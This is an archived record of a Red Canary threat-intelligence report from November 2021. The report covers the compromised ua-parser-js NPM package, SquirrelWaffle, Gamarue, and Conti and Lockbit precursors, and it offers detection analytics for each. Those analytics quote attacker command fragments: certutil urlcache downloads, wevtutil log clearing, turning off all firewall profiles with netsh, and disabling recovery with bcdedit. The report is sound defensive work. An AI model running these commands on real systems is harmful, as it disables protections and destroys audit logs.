{
	"id": "cc666ad3-7aa0-4d49-a7f4-e6ecb3be0f65",
	"created_at": "2026-04-06T00:10:46.417911Z",
	"updated_at": "2026-04-10T03:21:43.631099Z",
	"deleted_at": null,
	"sha1_hash": "be7215516f2c2196264ea04f98ede4c0ef683780",
	"title": "Intelligence Insights: November 2021",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 109653,
	"plain_text": "Intelligence Insights: November 2021\r\nBy susannah.matt@redcanary.com\r\nArchived: 2026-04-02 10:48:27 UTC\r\n⬆ = trending up from previous month\r\n⬇= trending down from previous month\r\n➡ = no change in rank from previous month\r\n*Denotes a tie\r\nNodeJS with a side of XMRig\r\nThird-party developer libraries and packages are an inescapable part of modern development, and the compromise\r\nof one package can cascade and affect multiple subsequent packages that depend on a single one. While fallout\r\nfrom a compromise of a popular NPM package last month appears relatively limited, the incident was a stark\r\nreminder of how adversaries can exploit organizations’ reliance on trusted development tools. In fact, as we’re\r\ngetting ready to publish this, we’re investigating a new potentially compromised package.\r\nIn October 2021, Red Canary identified a compromised package in NPM, a package distribution and management\r\nutility for JavaScript libraries. The compromised version of the package, ua-parser-js , distributed an XMRig\r\ncryptominer to Windows and Linux systems, as well as an infostealer (likely DanaBot) to Windows systems.\r\nThough the package is downloaded nearly 8 million times each week and the impact could have been widespread,\r\nGitHub quickly issued an advisory warning users that updating that package, or anything that depended on it,\r\nwould initiate malicious behavior on affected systems.\r\nIn this case, we detected the compromised version of ua-parser-js with detectors designed to identify the\r\ncryptominer and infostealer it distributed. Detection opportunities for this category of threat inherently depend on\r\nwhich malware a poisoned package contains.\r\nDetection opportunity: Certutil downloading a file\r\nThis detection opportunity will identify instances of Certificate Authority Utility ( certutil.exe ) with command-line arguments to download an arbitrary file. This behavior is commonly observed across multiple threats and is\r\none reliable way adversaries use to download tools on Windows.\r\nprocess == certutil.exe\r\n\u0026\u0026\r\ncommand_line_contains == urlcache\r\nWhen TR delivers SquirrelWaffle, ransomware precursors may soon follow…\r\nhttps://redcanary.com/blog/intelligence-insights-november-2021/\r\nPage 1 of 6\n\nIn late October 2021, Red Canary observed an uptick in detections involving TR (a delivery affiliate) and\r\nSquirrelWaffle. In some cases where we detected TR delivering SquirrelWaffle, we observed additional payloads\r\nand domain reconnaissance beginning within minutes. The short dwell time, combined with recent external\r\nreporting that suggests new TR tradecraft can bypass certain email protections, highlights the need to detect and\r\nrespond to these behaviors in near real time to avoid late-stage activity such as ransomware.\r\nRecent initial access tradecraft may allow adversaries to bypass certain protections provided by\r\nsecure email gateways, increasing the odds that a malicious email is delivered to users’ inboxes. In\r\nearly November, security researchers reported that TR used compromised, on-premises Exchange servers\r\nto send malicious emails to potential victims. As context, successful exploitation of Microsoft Exchange\r\non-premises products enables system access, control of an enterprise email server, and access to\r\nenterprise email accounts. This access effectively allows an adversary to send and receive email from a\r\nvictim’s account with the legitimacy of a trusted, internal sender.\r\nDecreased dwell time underscores the criticality of detecting and responding to ransomware\r\nprecursor activity quickly. In one incident, operators executed Cobalt Strike and BloodHound—hallmark\r\nransomware precursors—only 75 minutes after a user first opened the malicious XLS phishing lure that\r\ninitiated SquirrelWaffle. Short dwell times necessitate a clear understanding of adversary behavior and a\r\nrobust toolbox of detection analytics to identify this behavior.\r\nDetection opportunity: Excel spawning Regsvr32\r\nThis detection opportunity will identify instances of regsvr32.exe spawning as a child process of Microsoft\r\nExcel. This behavior is commonly observed in malicious documents with macros or Dynamic Data Exchange\r\n(DDE) execution, notably SquirrelWaffle XLS documents delivered by TR.\r\nparent_process == excel.exe\r\n\u0026\u0026\r\nprocess == regsvr32.exe\r\nWith a twinkle in its eyes, Gamarue makes the ascent\r\nWhile most of us were reaching for our favorite pumpkin spice latte this past month, Gamarue’s spot in our\r\nrankings suggests that many others opted to reach for their thumb drives instead. Gamarue is a malware family\r\nused as part of a botnet. Some variants of Gamarue are worms and frequently spread via infected USB drives.\r\nGamarue has also been used to spread other malware, steal information, and perform other activities such as click\r\nfraud. This malware was first seen more than 10 years ago and evolved into multiple variants before the operator\r\nwas arrested in 2017.\r\nThough Gamarue is no longer actively developed, it remains a pervasive threat. This highlights the notion that\r\neven if a threat is no longer active, it still warrants consideration from defenders tasked with responding to threats\r\nand building new detection logic.\r\nhttps://redcanary.com/blog/intelligence-insights-november-2021/\r\nPage 2 of 6\n\nDetection opportunity: Rundll32 Gamarue CLI\r\nWhile we love to focus on detection opportunities that can identify multiple different threats by identifying\r\nuncommon types of behavior, this detection opportunity focuses on activity that is specific to multiple different\r\nGamarue variants. Below you will find various examples that can be used to identify these variants executing.\r\n1. 1. 1. 1. 1. \\--_--_--_-__--_-__-__-__-_--__---_--_--_--_.--_--_--_-__--_-__-__-\r\n__-_--__---_--_--_--_,LFoRW4dX01fM8FeX\r\n2. \\_--_____--__----__--____---_----.{0B5C7B4B-7F44-02BE-99D4-\r\n8C4E124562AD},qwertyuiop123456\r\n3. \\\\\\\\\\\\\\\\\\\\\\~%%@@~%%@@~%%@@~.2,1abcDEfgHIJ2klM4\r\nIn conjunction with this detection opportunity, you may be able to identify the name of an infected thumb drive\r\nthat was plugged into the endpoint by looking for registry modifications to UserAssist registry keys containing the\r\nROT13 encoded string .yax at the same time. These registry values can be decoded to look something like\r\nf:\\usb drive (8gb).lnk , which may be indicative of a USB drive being the culprit.\r\nprocess == rundll32.exe\r\n\u0026\u0026\r\ncommand_line_matches == \\\\[-_.]+\\,\\w+\r\nprocess == rundll32.exe\r\n\u0026\u0026\r\ncommand_line_matches == \\\\[-_]+\\.\\{[A-Z0-9-]{36}\\}\\,\\w+\r\nprocess == rundll32.exe\r\n\u0026\u0026\r\ncommand_line_matches == \\\\+[~$%@]+\\.\\d\\,\\w+\r\nDetection opportunity: Rundll32 spawning Explorer\r\nThis detection opportunity hinges on the likelihood of rundll32.exe spawning explorer.exe . Red Canary\r\noften observes Gamarue spawning the explorer.exe process in an unusual way.\r\nparent_process == rundll32.exe\r\n\u0026\u0026\r\nprocess == explorer.exe\r\nDetection opportunity: Msiexec No CLI + External Netconn\r\nAs we mentioned in our 2021 Threat Detection Report, Gamarue can still be detected by identifying instances of\r\nthe Windows Installer ( msiexec.exe ) into which it has been injected. This type of activity can be identified by\r\ncreating a detection analytic that focuses on instances of Msiexec that have no associated command-line options or\r\nan external network connection.\r\nhttps://redcanary.com/blog/intelligence-insights-november-2021/\r\nPage 3 of 6\n\nprocess == msiexec.exe\r\n\u0026\u0026\r\ncommand_line == “”\r\n\u0026\u0026\r\nhas_external_netconn?\r\n*Note: Double quotes (“”) within the command line means null.\r\nNew opportunities for detecting ransomware precursors\r\nIn October, we observed Conti and Lockbit affecting multiple customer environments. Fortunately, there are\r\nseveral opportunities to detect precursor behavior for these threats.\r\nConti precursor activity\r\nIn October, we observed several new Qbot TTPs in environments ultimately encrypted with Conti. Notably, we\r\nsaw Qbot inject into Microsoft Synchronization Center ( mobsync.exe ) and drop Conti DLLs. Additionally, we\r\nsaw Qbot inject into Windows Error Reporting ( werfault.exe ) with no command-line parameters. Following\r\nthis, the adversary used the xcopy utility to copy the malicious DLLs to different locations on the system. There\r\nare multiple opportunities to detect this activity in your environment:\r\nDetection opportunity: Mobsync creating unusual DLL files\r\nThis detection analytic will identify an unusual file modification stemming from the mobsync.exe process. We\r\ndetermined this file was Conti ransomware in one incident.\r\nprocess == mobsync.exe\r\n\u0026\u0026\r\nfile_modification_create == *.dll\r\nDetection opportunity: Werfault spawning with no command-line parameters\r\nThis detection analytic will identify unusual activity originating from the werfault.exe process. Werfault\r\ntypically spawns with command-line parameters when a process crashes, providing the program with input to\r\ncreate an error report.\r\nprocess == werfault.exe\r\n\u0026\u0026\r\ncommand_line == “”\r\nDetection opportunity: Xcopy moving files from Group Policy Object (GPO) storage folder\r\nhttps://redcanary.com/blog/intelligence-insights-november-2021/\r\nPage 4 of 6\n\nQbot created malicious files within the GPO storage folder during execution. Then, it used the Extended Copy\r\nUtility ( xcopy.exe ) to copy malicious DLLs, including Conti. The following analytic will identify this activity:\r\nprocess == xcopy.exe\r\n\u0026\u0026\r\ncommand_line_contains == \\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\r\n\u0026\u0026\r\nfile_modification_create == *.dll\r\n*Note: 31B2F340-016D-11D2-945F-00C04FB984F9 is the default domain policy GUID\r\nLockbit precursor activity\r\nDuring a recent Lockbit infection, the operators used PsExec to launch a batch script, which initiated several\r\ncommands designed to prepare the environment for encryption. The batch script displayed the following actions:\r\nset antivirus exclusion paths for C:\\Programdata\\  and C:\\Windows\\ that allowed malicious binaries to\r\nexist in these paths without interference\r\ndeleted the Windows Defender service\r\ndisabled Windows Defender, User Account Control (UAC), and Windows Recovery\r\nturned off all firewall rules\r\ncleared multiple System and Security logs\r\nThe defense evasion and system recovery commands initiated by the script offer multiple detection opportunities.\r\nDetection opportunity: Disabling Windows Recovery via bcedit\r\nIn combination with the other commands witnessed in the same timeframe, the use of the Boot Configuration\r\nediting tool ( bcdedit.exe ) to set specific recovery options helped us identify malicious activity.\r\nprocess == bcdedit.exe\r\n\u0026\u0026\r\nParent_process == ( “rundll32.exe” || “regsvr32.dll” )\r\n\u0026\u0026\r\ncommand_line_contains == “recoveryenabled No”\r\nDetection opportunity: Wevtutil clearing System and Security logs\r\nThe Windows Event Log Utility Tool ( wevtutil.exe ) process deleted both System and Security event logs. This\r\nbehavior is atypical in most environments.\r\nprocess == wevtutil.exe\r\n\u0026\u0026\r\ncommand_line_contains == cl\r\nhttps://redcanary.com/blog/intelligence-insights-november-2021/\r\nPage 5 of 6\n\n\u0026\u0026\r\n(command_line_contains == Security\r\n||\r\ncommand_line_contains == System )\r\nDetection opportunity: Netsh turning off all firewall rules\r\nSetting all of the system firewall rules to a state of “off” should be considered suspicious and investigated further.\r\nWhile this may be a “normal” system administration function in some cases, it merits close review when observed\r\nwith other activity associated with Lockbit.\r\nprocess == netsh.exe\r\n\u0026\u0026\r\ncommand_line_contains == advfirewall set allprofiles state off\r\nSource: https://redcanary.com/blog/intelligence-insights-november-2021/\r\nhttps://redcanary.com/blog/intelligence-insights-november-2021/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://redcanary.com/blog/intelligence-insights-november-2021/"
	],
	"report_names": [
		"intelligence-insights-november-2021"
	],
	"threat_actors": [],
	"ts_created_at": 1775434246,
	"ts_updated_at": 1775791303,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/be7215516f2c2196264ea04f98ede4c0ef683780.pdf",
		"text": "https://archive.orkl.eu/be7215516f2c2196264ea04f98ede4c0ef683780.txt",
		"img": "https://archive.orkl.eu/be7215516f2c2196264ea04f98ede4c0ef683780.jpg"
	}
}